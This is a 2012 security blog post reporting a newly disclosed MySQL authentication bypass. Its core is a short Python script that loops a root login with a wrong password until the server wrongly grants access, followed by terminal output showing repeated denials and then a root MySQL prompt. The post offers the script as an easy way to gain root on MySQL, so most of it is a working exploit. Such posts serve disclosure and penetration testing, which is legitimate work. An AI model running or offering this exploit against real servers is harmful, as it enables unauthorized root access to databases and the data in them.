Skip to Main Content
June 24, 2012

Massive MYSQL Authentication Bypass Exploit

Written by David Kennedy
Penetration Testing Security Testing & Analysis
There has been a new MYSQL authentication bypass exploit released on seclist here: http://seclists.org/oss-sec/2012/q2/493. It is absolutely trivial to gain root access to a MySQL database at this point. Thanks to jduck for the tweet bringing this to our attention. Easy python script to gain root access to MySQL:

#!/usr/bin/python
import subprocess

while 1: subprocess.Popen("mysql -u root mysql --password=blah",
         shell=True).wait()
Below running the command: relik@stronghold:~# python mysql_bypass.py ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 24598 Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu) Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. mysql>